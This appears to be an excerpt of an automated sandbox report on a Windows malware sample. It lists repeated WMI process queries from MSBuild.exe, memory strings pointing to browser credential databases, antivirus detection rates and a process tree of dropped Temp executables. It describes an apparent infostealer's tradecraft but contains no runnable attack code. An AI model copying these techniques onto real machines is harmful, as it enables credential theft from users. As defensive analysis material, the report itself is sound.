Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2064
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1956
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5672

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u3bs.0.exe, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: AEHIECAFCGDBFHIDBKFC.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: TNQTc6Qmkg.exe	ReversingLabs: Detection: 47%
Source: TNQTc6Qmkg.exe	Virustotal: Detection: 44%

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File read: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TNQTc6Qmkg.exe "C:\Users\user\Desktop\TNQTc6Qmkg.exe"
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe"
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe"
